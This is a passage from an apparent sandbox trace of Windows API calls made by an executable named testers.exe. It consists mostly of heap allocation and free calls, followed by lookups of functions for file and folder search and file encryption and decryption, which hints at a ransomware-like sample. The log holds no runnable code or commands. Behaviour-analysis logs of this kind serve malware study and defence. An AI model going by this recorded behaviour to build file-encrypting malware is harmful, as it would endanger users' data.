hHeap=0xbe0000) returned 1 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13180 | out: hHeap=0xbe0000) returned 1 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13170 | out: hHeap=0xbe0000) returned 1 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137c8 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137b0 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13798 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc137e0 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13170 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137b0 | out: hHeap=0xbe0000) returned 1 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137b0 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13720 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13798 | out: hHeap=0xbe0000) returned 1 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13798 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13180 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13738 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc136a8 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13190 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13180 | out: hHeap=0xbe0000) returned 1 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc136c0 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc136d8 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13738 | out: hHeap=0xbe0000) returned 1 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa) returned 0xc13738 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13690 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13180 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13690 | out: hHeap=0xbe0000) returned 1 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13180 | out: hHeap=0xbe0000) returned 1 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13738 | out: hHeap=0xbe0000) returned 1 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13738 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xe) returned 0xc13690 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13678 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13180 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13678 | out: hHeap=0xbe0000) returned 1 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13180 | out: hHeap=0xbe0000) returned 1 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13690 | out: hHeap=0xbe0000) returned 1 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13690 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x12) returned 0xc0a628 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc066b0 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13180 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc066b0 | out: hHeap=0xbe0000) returned 1 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13180 | out: hHeap=0xbe0000) returned 1 [0245.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a628 | out: hHeap=0xbe0000) returned 1 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13678 [0245.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13630 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13618 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13660 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13600 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc135e8 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x2) returned 0xc13180 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc135a0 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc135b8 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc131a0 [0245.307] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13180 | out: hHeap=0xbe0000) returned 1 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc135d0 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13588 [0245.307] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc135a0 | out: hHeap=0xbe0000) returned 1 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc135a0 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13570 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x3c) returned 0xbf22d0 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13558 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13f48 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13f60 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13f78 [0245.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13f90 [0245.321] IUnknown:Release (This=0xc06520) returned 0x0 [0245.321] FreeLibrary (hLibModule=0x290000) returned 1 [0245.321] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9250 | out: hHeap=0xbe0000) returned 1 [0245.321] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9238 | out: hHeap=0xbe0000) returned 1 [0245.321] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13940 | out: hHeap=0xbe0000) returned 1 [0245.321] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8bf9f0, lpFilePart=0x8dfa10 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x8dfa10*="testers.exe") returned 0x2f [0245.322] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9250 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ae8 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8680 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9328 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9340 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9358 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9370 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9388 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93a0 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc838d8 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06520 | out: hHeap=0xbe0000) returned 1 [0245.322] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0245.322] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.323] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9388 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9370 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9358 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9340 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9328 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8680 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06520 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.323] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.323] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06520 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9328 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9340 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.323] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.324] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.324] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9328 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8680 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06520 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.324] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.324] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06520 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9328 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9340 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9358 | out: hHeap=0xbe0000) returned 1 [0245.324] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9370 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.325] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.325] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9358 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9340 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9328 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.325] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.325] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9340 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9358 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9370 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.325] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8680 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9388 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93a0 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8ae8 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.326] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.326] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93a0 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9388 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8680 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9370 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9358 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9340 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06520 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.326] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.327] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.327] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06520 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9358 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9370 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8680 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9388 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe668 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.327] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06548 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58d0 | out: hHeap=0xbe0000) returned 1 [0245.327] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8680 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf58e0 | out: hHeap=0xbe0000) returned 1 [0245.327] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf92f8 | out: hHeap=0xbe0000) returned 1 [0245.327] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0245.328] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0245.328] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0245.328] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0245.328] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0245.328] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0245.328] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0245.328] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0245.328] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0245.328] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0245.328] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0245.328] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0245.328] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.328] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: 